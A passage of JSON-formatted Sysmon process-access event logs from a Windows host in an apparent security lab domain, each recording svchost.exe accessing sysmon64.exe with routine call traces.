07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 